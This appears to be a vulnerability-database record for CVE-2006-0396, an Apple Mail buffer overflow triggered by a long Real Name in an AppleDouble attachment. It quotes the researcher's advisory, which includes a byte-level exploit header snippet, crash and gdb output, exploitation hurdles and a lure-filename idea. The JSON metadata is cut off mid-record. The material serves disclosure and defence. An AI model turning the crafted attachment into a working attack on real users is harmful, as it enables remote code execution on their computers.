Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer. This issue is present in Apple Mail when 'Security Update 2006-001' is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not "safe". Prior to 2006-001 certain techniques could be used to disguise a file's type so that the validation was bypassed. Unfortunately in the process of patching the previous problem a new one was introduced.

After applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that may be triggered via a properly formatted MIME Encapsuled Macintosh file. Sending a file in the AppleDouble format with a long Real Name entry will invoke the overflow. Reading through RFC1740 should provide enough information to trigger the issue. The overflow is triggered by the file that contains the AppleDouble header information.

The format of the header we need to send is as follows:

[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...] Entry descriptor for each Entry: [4 byte entry id][4 byte offset][4 byte length]

Using the above layout we come up with the following code snippet for our exploit.

"\x00\x05\x16\x07". # AppleDouble Magic Number "\x00\x02\x00\x00". # Version 2 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler "\x00\x03\x00\x00". # Number of entries (3) "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info' "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10 "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name' "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48 "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245 "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork' "\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d "\x05\x3a\x00\x00". # Length of Resource fork is 0x053a "\x00\x00\x00\x00". # filler "\x00\x00\x00\x00". # filler "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.

If a message with the above header arrived in your inbox on Mail.app you would see only the first 11 characters of the name provided by the Real Name entry. In this particular case you see "AAAAAAAAAAA...mov" . Other examples could be "SuperTastey...mov" or NakedChicks...mov" . The visual aspects of the (...) are surprisingly not that suspicious.

Upon double clicking the attached file on the arrived email the following dump is created.

Date/Time: 2006-03-04 10:35:32.472 -0500 OS Version: 10.4.5 (Build 8H14) Report Version: 4

Command: Mail Path: /Applications/Mail.app/Contents/MacOS/Mail Parent: WindowServer [64]

Version: 2.0.7 (746.2) Build Version: 1 Project Name: MailViewer Source Version: 7460200

PID: 271 Thread: 0

Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140

If we take a look at this in gdb we can see that several things are overwirtten. (gdb) bt

0 0x41424344 in ?? ()

Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344

1 0x41424344 in ?? ()

Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313131 warning: Previous frame identical to this frame (corrupt stack?) Cannot access memory at address 0x41424344 Cannot access memory at address 0x41424344 Cannot access memory at address 0x31313139

We control r0, pc, lr and half of r31. (gdb) i r $r0 $pc $lr $r31 r0 0x41424344 1094861636 pc 0x41424344 1094861636 lr 0x41424344 1094861636 r31 0x18b3030 25899056

Exploitation of this issue seems possible however there are currently some limitations with regard to what can and can not be done.

The first issue involves previous exploitation attempts and the temporary files left behind by such attempts.

k-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\ Downloads/ /Users/test/Library/Mail Downloads/: total 352 drwx------ 7 test admin 238 Mar 13 22:42 . drwx------ 23 test admin 782 Mar 12 15:52 .. drwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000 11112222ABCD3333zzz.mov.mailhold

/var/tmp/folders.502/TemporaryItems/: total 352 drwxr-xr-x 4 test wheel 136 Mar 13 22:38 . drwx------ 3 test wheel 102 Mar 12 10:35 .. -rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001 1112222ABCD3333zzz.mov.mov

The existance of a particular temporary file can halt the actions of an exploit attempting to take advantage of this issue. While developing an exploit keeping the two folders shown above clean is critical! The temporary files appear to be created during the process of previewing a message. In some cases they may not be created due to failed mkstemp() calls.

The next issue centers around the fact that RFC1740 states that the Real Name entry can only contain 7bit printable ascii, using shellcode addresses with 0xff and 0xbf will not be possible because of this. This obviously eliminates alot of easy shellcode addresses unfortunately.

0xbfffe6e1: "Users/test/Library/Mail Downloads/", 'a' ... 0xbfffe7a9: 'a' , "00\032\xff\xf8"

Code in other areas seems to be either in an unreliable location or in a unicode format. I am really not in the mood to hunt around memory for a stable address but I am sure that something could be put together to exploit this.

Here is an example of the Unicode strings that can be found in memory at random places. (gdb) x/30a $r29 0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065 0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f 0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f 0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077 0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061 0x18b8a50: 0x610061 0x610061 0x610061 0x610061 0x18b8a60: 0x610061 0x610061 0x610061 0x610061 0x18b8a70: 0x610061 0x610061

On x86 the Unicode may not be a problem however I do not have access to an intel based mac so I can not confirm this. On PowerPC however for the time being there is not much I can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the moment.

For the time being my exploitation has not gone beyond what I have documented here. Beyond the few hurdles I have outlined may lie a few more, but who knows? Good luck.

Work Around: Install 2006-002 update or simply do not open attachments in Mail.app
http://www.apple.com/support/downloads/

Sidenote: Much thanks to Apple for the quick turnaround time and prompt weekend responses! A same day response and 9 day turn around is hard to beat

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200603-0281",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.2"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.3"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.4"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.2"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.5"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.1"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.1"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.4"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "10.4.3"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.4.5"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.4"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple computer",
        "version": null
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.4 to  10.4.5"
      },
      {
        "model": "mac os x server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.4 to  10.4.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.3"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.2"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "db": "BID",
        "id": "17081"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:apple:mac_os_x",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:apple:mac_os_x_server",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Kevin Finisterre dotslash@snosoft.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2006-0396",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.9,
            "id": "CVE-2006-0396",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.9,
            "id": "VHN-16504",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2006-0396",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#980084",
            "trust": 0.8,
            "value": "6.63"
          },
          {
            "author": "NVD",
            "id": "CVE-2006-0396",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200603-268",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-16504",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2006-0396",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "db": "VULMON",
        "id": "CVE-2006-0396"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer. \nThis issue is present in Apple Mail when \u0027Security Update 2006-001\u0027 is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not \"safe\". Prior \nto 2006-001 certain techniques could be used to disguise a file\u0027s type so that the validation \nwas bypassed. Unfortunately in the process of patching the previous problem a new one was \nintroduced. \n\nAfter applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that\nmay be triggered via a properly formatted MIME Encapsuled Macintosh file. Sending a file in \nthe AppleDouble format with a long Real Name entry will invoke the overflow. Reading through \nRFC1740 should provide enough information to trigger the issue. The overflow is triggered \nby the file that contains the AppleDouble header information. \n\nThe format of the header we need to send is as follows: \n\n[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...]\nEntry descriptor for each Entry:\n[4 byte entry id][4 byte offset][4 byte length]\n\nUsing the above layout we come up with the following code snippet for our exploit. \n\n\"\\x00\\x05\\x16\\x07\".     # AppleDouble Magic Number\n\"\\x00\\x02\\x00\\x00\".     # Version 2\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \t# 16 Bytes of filler\n\"\\x00\\x03\\x00\\x00\".     # Number of entries (3)\n\"\\x00\\x09\\x00\\x00\".     # Entry ID 9 is for \u0027Finder Info\u0027\n\"\\x00\\x3e\\x00\\x00\".     # Start of Finder Info data is at file offset 0x3e\n\"\\x00\\x0a\\x00\\x00\".     # Length of Finder Info is 0x0a or 10\n\"\\x00\\x03\\x00\\x00\".     # Entry ID 3 is for \u0027Real Name\u0027\n\"\\x00\\x48\\x00\\x00\".     # Start of Real Name data is at file offset 0x48\n\"\\x00\\xf5\\x00\\x00\".     # Length of Real Name is 0xf5 or 245\n\"\\x00\\x02\\x00\\x00\".     # Entry ID 2 is for \u0027Resource Fork\u0027\n\"\\x01\\x3d\\x00\\x00\".     # Start of Resource Fork is at file offset 0x013d\n\"\\x05\\x3a\\x00\\x00\".     # Length of Resource fork is 0x053a\n\"\\x00\\x00\\x00\\x00\".     # \u003cnull\u003e filler\n\"\\x00\\x00\\x00\\x00\".     # \u003cnull\u003e filler\n\"A\" x 226 . \"$retaddr\" x 3 . \"zzz.mov.\" . # remember this length is hard coded above. \n\nIf a message with the above header arrived in your inbox on Mail.app you would see only the\nfirst 11 characters of the name provided by the Real Name entry. In this particular case you \nsee \"AAAAAAAAAAA...mov\" . Other examples could be \"SuperTastey...mov\" or NakedChicks...mov\" . \nThe visual aspects of the (...) are surprisingly not that suspicious. \n\nUpon double clicking the attached file on the arrived email the following dump is created. \n\nDate/Time:      2006-03-04 10:35:32.472 -0500\nOS Version:     10.4.5 (Build 8H14)\nReport Version: 4\n\nCommand: Mail\nPath:    /Applications/Mail.app/Contents/MacOS/Mail\nParent:  WindowServer [64]\n\nVersion:        2.0.7 (746.2)\nBuild Version:  1\nProject Name:   MailViewer\nSource Version: 7460200\n\nPID:    271\nThread: 0\n\nException:  EXC_BAD_ACCESS (0x0001)\nCodes:      KERN_INVALID_ADDRESS (0x0001) at 0x41414140\n\nIf we take a look at this in gdb we can see that several things are overwirtten. \n(gdb) bt\n#0  0x41424344 in ?? ()\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313131\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\n#1  0x41424344 in ?? ()\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313131\nwarning: Previous frame identical to this frame (corrupt stack?)\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313139\n\nWe control r0, pc, lr and half of r31. \n(gdb) i r $r0 $pc $lr $r31\nr0             0x41424344       1094861636\npc             0x41424344       1094861636\nlr             0x41424344       1094861636\nr31            0x18b3030        25899056\n\nExploitation of this issue seems possible however there are currently some limitations \nwith regard to what can and can not be done. \n\nThe first issue involves previous exploitation attempts and the temporary files left \nbehind by such attempts. \n\nk-fs-ibook:~ test$  ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\\ Downloads/\n/Users/test/Library/Mail Downloads/:\ntotal 352\ndrwx------    7 test  admin    238 Mar 13 22:42 . \ndrwx------   23 test  admin    782 Mar 12 15:52 .. \ndrwx------    3 test  admin    102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000\n11112222ABCD3333zzz.mov.mailhold\n\n/var/tmp/folders.502/TemporaryItems/:\ntotal 352\ndrwxr-xr-x   4 test  wheel    136 Mar 13 22:38 . \ndrwx------   3 test  wheel    102 Mar 12 10:35 .. \n-rwxr-xr-x   1 test  wheel  90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001\n1112222ABCD3333zzz.mov.mov\n\nThe existance of a particular temporary file can halt the actions of an exploit attempting \nto take advantage of this issue. While developing an exploit keeping the two folders shown \nabove clean is critical! The temporary files appear to be created during the process of \npreviewing a message. In some cases they may not be created due to failed mkstemp() calls. \n\nThe next issue centers around the fact that RFC1740 states that the Real Name entry can \nonly contain 7bit printable ascii, using shellcode addresses with 0xff and 0xbf will not\nbe possible because of this. This obviously eliminates alot of easy shellcode addresses \nunfortunately. \n\n0xbfffe6e1:      \"Users/test/Library/Mail Downloads/\", \u0027a\u0027 \u003crepeats 166 times\u003e... \n0xbfffe7a9:      \u0027a\u0027 \u003crepeats 52 times\u003e, \"00\\032\\xff\\xf8\"\n\nCode in other areas seems to be either in an unreliable location or in a unicode format. \nI am really not in the mood to hunt around memory for a stable address but I am sure that\nsomething could be put together to exploit this. \n\nHere is an example of the Unicode strings that can be found in memory at random places. \n(gdb) x/30a $r29\n0x18b8a00:      0xa28e6424      0x12100000      0x2f0055        0x730065\n0x18b8a10:      0x720073        0x2f0074        0x650073        0x74002f\n0x18b8a20:      0x4c0069        0x620072        0x610072        0x79002f\n0x18b8a30:      0x4d0061        0x69006c        0x200044        0x6f0077\n0x18b8a40:      0x6e006c        0x6f0061        0x640073        0x2f0061\n0x18b8a50:      0x610061        0x610061        0x610061        0x610061\n0x18b8a60:      0x610061        0x610061        0x610061        0x610061\n0x18b8a70:      0x610061        0x610061\n\nOn x86 the Unicode *may* not be a problem however I do not have access to an intel based\nmac so I can not confirm this. On PowerPC however for the time being there is not much \nI can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the \nmoment. \n\nFor the time being my exploitation has not gone beyond what I have documented here. Beyond \nthe few hurdles I have outlined may lie a few more, but who knows? Good luck. \n\nWork Around: \nInstall 2006-002 update or simply do not open attachments in Mail.app  \nhttp://www.apple.com/support/downloads/\n\nSidenote:\nMuch thanks to Apple for the quick turnaround time and prompt weekend responses! A same\nday response and 9 day turn around is hard to beat",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2006-0396"
      },
      {
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "db": "BID",
        "id": "17081"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "db": "VULMON",
        "id": "CVE-2006-0396"
      },
      {
        "db": "PACKETSTORM",
        "id": "44647"
      }
    ],
    "trust": 2.88
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-16504",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=1583",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "db": "VULMON",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#980084",
        "trust": 3.4
      },
      {
        "db": "NVD",
        "id": "CVE-2006-0396",
        "trust": 3.0
      },
      {
        "db": "SECUNIA",
        "id": "19129",
        "trust": 2.6
      },
      {
        "db": "BID",
        "id": "17081",
        "trust": 2.1
      },
      {
        "db": "SECTRACK",
        "id": "1015762",
        "trust": 1.8
      },
      {
        "db": "VUPEN",
        "id": "ADV-2006-0949",
        "trust": 1.8
      },
      {
        "db": "OSVDB",
        "id": "23872",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268",
        "trust": 0.7
      },
      {
        "db": "BUGTRAQ",
        "id": "20060314 DMA[2006-0313A] - \u0027APPLE OSX MAIL.APP RFC1740 REAL NAME  BUFFER OVERFLOW\u0027",
        "trust": 0.6
      },
      {
        "db": "APPLE",
        "id": "APPLE-SA-2006-03-13",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "25209",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "1583",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-16504",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2006-0396",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "44647",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#980084"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16504"
      },
      {
        "db": "VULMON",
        "id": "CVE-2006-0396"
      },
      {
        "db": "BID",
        "id": "17081"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      },
      {
        "db": "PACKETSTORM",
        "id": "44647"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200603-268"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "id": "VAR-200603-0281",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-16504"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T21:03:29.802000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "17081",
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/17081"
      },
      {
        "title": "id?1015762",
        "trust": 0.8,
        "url": "http://securitytracker.com/id?1015762"
      },
      {
        "title": "19129",
        "trust": 0.8,
        "url": "http://secunia.com/advisories/19129"
      },
      {
        "title": "article",
        "trust": 0.8,
        "url": "http://docs.info.apple.com/article.html?artnum=303453"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-003846"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2006-0396"
      }
    ]
  },
  "references": {
    "@context": {
